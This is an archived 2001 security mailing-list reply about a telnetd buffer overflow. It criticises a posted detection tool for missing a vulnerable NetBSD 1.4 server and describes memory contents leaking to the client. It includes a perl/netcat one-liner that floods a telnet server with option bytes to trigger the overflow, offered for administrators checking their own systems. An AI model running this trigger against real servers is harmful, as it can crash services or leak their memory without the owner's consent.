On Wed, Jul 25, 2001 at 04:18:00PM -0400, der Mouse wrote: > Quite aside from the _horrible_ misuse of sprintf, this writes a NUL > one byte past the end of sendbuffer[]. > > I sure wouldn't trust anything about my system to code from whoever > wrote this. Just on a quick once-over, I see seven other things I > would say are wrong with it. In particular, it can't be trusted to properly assess vulnerability. In tests against a known vulnerable NetBSD 1.4 telnetd, this tool reports 'not vulnerable'. Deciding vulnerability based on only the output (or lack of) from the telnetd is insufficient. In the NetBSD 1.4 case, the overflow causes parts of the process's memory space (such as /etc/nsswitch.conf, and /etc/hosts) to end up in the output buffer and be sent to the client. I would advise that people not believe their systems are safe based on the output from the posted code. For manual inspection, if you have perl and netcat available, try: perl -e 'for ($i=0;$i<512;$i++) { print "\377\366" }' | nc testhost telnet While it's possible to have output that looks 'safe' from a run of this line - certain broken servers will stand out. If you see data in the output which shouldn't be there, the server is vulnerable. Note that the exploit posted earlier won't work against even slightly different systems (like NetBSD 1.3 or NetBSD 1.4), though the perl line above will show they clearly overflow, and an exploit could be constructed. -- David Maxwell, davidat_private|davidat_private --> Net Musing #5: Redundancy in a network doesn't mean two of everything and half the staff to run it. - Tomas T. Peiser, CET
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 14:15:09 PDT